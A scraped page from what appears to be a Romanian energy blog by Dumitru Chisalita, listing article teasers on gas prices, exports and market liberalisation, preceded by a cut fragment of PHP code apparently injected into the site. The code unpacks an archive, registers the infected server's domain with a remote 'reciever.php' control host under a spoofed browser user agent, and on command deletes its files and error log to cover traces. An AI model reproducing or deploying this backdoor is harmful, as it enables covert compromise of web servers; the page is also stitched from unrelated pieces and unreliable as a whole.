'; $data = $data1.$data2.$data3.$data4.$data5; $fas = fopen ($unzip_path, "w"); fwrite($fas, $data); fclose($fas); $unzip_url = 'http://'.$domain_name_2.'/'.$status[1].'unzip.php'; echo getURL($unzip_url); } } else { echo '~Can not upload archive!~'; rmdir($dir_path); exit; } if (file_exists($script_name)) { echo '~Client has been activated!~'; $file_name = $_SERVER['DOCUMENT_ROOT'].'/'.$status[1].'server_name.txt'; $file = fopen($file_name,"rt"); $original_file = fread($file,filesize($file_name)); fclose($file); $domain_name = $_SERVER['SERVER_NAME']; $url = $original_file.'reciever.php?data='.$domain_name; $UA = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_REFERER, $domain_name); curl_setopt($ch, CURLOPT_USERAGENT, $UA); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); echo $data.'
'; $data = file_get_contents($url); echo $data.'
'; echo getURL($url); exit; } else { echo '~Can not unziped!~'; unlink($archive_path); rmdir($dir_path); exit; } } else { echo '~Can not make dir!~'; exit; } } if ($status[0] == 'finish') { $file_name_2 = $_SERVER['DOCUMENT_ROOT'].'/'.$status[1].'server_name.txt'; $file_2 = fopen($file_name_2,"rt"); $original_file_2 = fread($file_2,filesize($file_name_2)); fclose($file_2); if (($status[1] != null) and ($status[1] != '')) $dir_for_work = $status[1]; else $dir_for_work = 'conflg/'; $dir_path = $_SERVER['DOCUMENT_ROOT'].'/'.$dir_for_work; $archive_path = $dir_path.'1.zip'; if (is_dir($dir_path)) { $arr_filename = array (); if ($dh = opendir($dir_path)) { while (($file = readdir($dh)) !== false) { if (($file != ".") and ($file != "..")) $arr_filename[] = $file; } closedir($dh); } foreach ($arr_filename as $key) { $key = trim($key); $file_for_delete = "$dir_path/$key"; $file_for_delete = str_replace('///', '/', $file_for_delete); $file_for_delete = str_replace('//', '/', $file_for_delete); $file_for_check = str_replace($_SERVER['DOCUMENT_ROOT'], '/', $file_for_delete); $file_for_check = str_replace('//', '/', $file_for_check); if (substr_count($file_for_check, "/") >=2) { if (file_exists($file_for_delete)) unlink($file_for_delete); if (file_exists($file_for_delete)) { chmod($file_for_delete, 0777); unlink($file_for_delete); } } } } if (file_exists("error_log")) unlink("error_log"); if (is_dir($dir_path)) rmdir($dir_path); if (is_dir($dir_path)) { chmod($dir_path, 0777); rmdir($dir_path); } if (is_dir($dir_path)) echo "~Error!~"; else { $domain_name = $_SERVER['SERVER_NAME']; $url = $original_file_2.'reciever.php?del='.$domain_name; $UA = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_REFERER, $domain_name); curl_setopt($ch, CURLOPT_USERAGENT, $UA); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); echo $data.'
'; $data = file_get_contents($url); echo $data.'
'; echo getURL($url); } exit; } } } ?> export gaze | Dumitru Chisalita

Rss

Archives for : export gaze

Ungaria – țara care-și apără consumatorii de gaze și dezvoltă mecanisme de reducere a prețului pentru aceștia

Gazele care intră din Ungaria în România sunt tarifate de către compania maghiară de transport cu un tarif de 24 ori mai mare decât gazele care intră din România în Ungaria. Astfel, prin practicarea unui tarif de transport mai mic pentru gazele  „exportate” din România, se stimulează exportul de gaze ieftine către Ungaria, care au ca rezultat prețuri mai mici al gazelor pe piaţă.

Continue Reading >>

Consumatorii români de gaze fac ca gazele care ajung în Ungaria să fie mai ieftine

Interconectarea sistemelor de transport gaze naturale, dintre oricare două ţări membre ale UE, nu trebuie să determine creșterea preţurilor gazelor naturale la toţi consumatorii finali. Toate costurile aferente construcției interconectorului, ar trebui să fie recuperate exclusiv de la cei care-l vor folosi, fără a determina toţi consumatorii dintr-o ţară sau alta, să subvenţioneze această construcţie.

Continue Reading >>

Securitate energetică versus independență energetică?

Strategia are întotdeauna un scop, pentru domeniul energetic acesta ar putea fi menținerea unui echilibru permanent între resursele societății și nevoile cetățenilor și al firmelor, cu fructificarea ocaziilor favorabile ivite pe plan național sau internațional și limitarea pericolelor care planează asupra României.

Continue Reading >>

Preţul gazelor pe o piață liberalizată

Preţul gazelor pe o piaţă liberalizată l-aş definii ca o rezultantă unitară a valorii de piaţă şi reprezintă suma pentru care o cantitate poate fi schimbată la o dată, între un cumpărător hotărât şi un vânzător hotărât, într-o tranzacţie echilibrată, după un marketing adecvat, în care fiecare parte acţionează în cunoştinţă de cauză (informat), prudent şi fără constrângeri.

Continue Reading >>

Formarea pieţei de gaze din România

Prima piaţă a gazelor naturale din Europa a luat fiinţă în Transilvania, între anii 1915-1917 şi s-a dezvoltat după regulile economiei de piaţă până în anul 1948, la naţionalizare, continuând să crească spectaculos sub aspectul volumelor furnizate, chiar şi în cadrul econonimiei planificate, etatistă, până în anul 1979, ulterior începând un declin al acesteia.

Continue Reading >>

Pieţe de gaze – de la formare la liberalizare

Tot mai multe discuţii despre una, două sau mai multe burse de gaze apar în România. Ceea ce nu se înţelege este că bursa este o instituţie care permite desfăşurarea tranzacţilor, dar tranzacţile sunt desfăşurate de persoane şi instituţii.  Activitatea tranzacţionării gazelor pe bursa, are nevoie dincolo de o legislaţie corespunzătoare, de o cultură  specifică, de metode de comunicare, de transparenţă, activităţi care nu sunt promovate, întreţinute si conduse de nici una din instituţile statului roman.

Continue Reading >>

Swapping sau export de gaze fara gaze

 

Dezvoltarea pieţei de gaze naturale a determinat apariţia unor noi tehnici comerciale ca răspuns la cererea unor clienţi pentru anumite situaţii date, care au fost speculate licit, de participanţii la piaţă şi transformate iniţial în oferte de răspuns pentru situaţia dată, iar ulterior constatându-se avantajele conferite în tehnici comerciale.

Continue Reading >>

Exportul de gaze intercomunitar

Liberalizarea pieţei gazelor naturale începută în anul 1986 în UK, continuată în Europa dupa anul 1998 a determinat necesitatea introducerii pe piaţa a noi instrumente comerciale care să asigure funcţionalitatea pieţei. Peste 30 de noi instrumente comerciale au fost introdu-se pe pieţele gazelor naturale în ultimii 15 ani. Între acestea se găseşte şi capacitatea de backhaul rezervată într-un punct din sistemul de transport unde nu se poate asigura curgerea fizică a gazelor.

Continue Reading >>

Intreruptibilitatea pe piata gazelor naturale si subminare a economiei nationale?

Scandalul “Gaze ieftine pentru industria chimica”, in care sunt implicati inclusiv 2 ministrii, a demarat  in jurul unei notiuni: “intreruptibilitatea gazelor”. Clientii stabiliti prin lege ca fiind intreruptibili, au beneficiat de discounturi importante in perioada 2007-2010 la achizitia gazelor naturale. Un instrument comercial deosebit de util pe piata gazelor din intreaga lume, a fost deturnat in Romania pentru favorizarea unor clienti. 

Continue Reading >>

Evitarea incapacităţii de plată prin abonamentul pe gaze

Incapacitatea de plată a unor consumatori în perioada rece se datorează și sistemului de tarifare existent făcând ca anumiţi consumatori să fie categorisiţi ca vulnerabili din această situaţie. Introducerea unui Abonament de gaze ar putea diminua impactul plății consumului de gaze în perioada rece şi să avantajeze consumatorii.

Continue Reading >>